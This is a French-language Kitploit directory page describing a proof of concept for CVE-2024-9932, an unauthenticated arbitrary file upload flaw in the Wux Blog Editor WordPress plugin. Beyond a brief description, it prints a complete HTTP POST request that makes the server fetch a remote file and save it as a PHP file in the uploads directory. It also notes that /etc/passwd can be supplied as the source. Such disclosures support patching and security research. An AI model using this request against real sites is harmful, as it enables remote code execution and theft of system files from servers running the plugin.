Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-9932 — Wux Blog Editor <= 3.0.0 - Téléchargement de fichier arbitraire non authentifié | Kitploit
Outils/GitHubGitHub/randomrobbiebf/cve-2024-9932
Génération de PayloadsAnalyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'Intrusion
GitHubrandomrobbiebf/cve-2024-9932

CVE-2024-9932

Wux Blog Editor <= 3.0.0 - Téléchargement de fichier arbitraire non authentifié

Voir le dépôt
31il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-9932

Wux Blog Editor <= 3.0.0 - Téléchargement arbitraire de fichiers non authentifié

Description :

Le plugin Wux Blog Editor pour WordPress est vulnérable aux téléchargements arbitraires de fichiers en raison d'une validation insuffisante du type de fichier dans la fonction wuxbt_insertImageNew dans les versions jusqu'à 3.0.0 inclus. Cela permet à des attaquants non authentifiés de télécharger des fichiers arbitraires sur le serveur du site affecté, ce qui pourrait permettre l'exécution de code à distance possi

root@kitploit:~
Link: CVE-2024-9932
State: PUBLISHED
Score: 9.8
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

POC

root@kitploit:~
POST /wp-json/external-post-editor/v2/image-upload HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal/wp-admin/plugins.php?plugin_status=all&paged=1&s
Content-Type: application/json; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 165
Origin: http://kubernetes.docker.internal
Connection: keep-alive

{
    "url": "https://rfi.nessus.org/rfi.txt",
    "imageName": "rf.php",
    "image_alt": "Description of the image",
    "image_title": "Title of the image"
}

Le fichier se retrouve dans /wp-content/uploads/2024/11/rf.php

Vous pouvez également lui fournir un emplacement de fichier comme /etc/passwd

Télécharger l’outil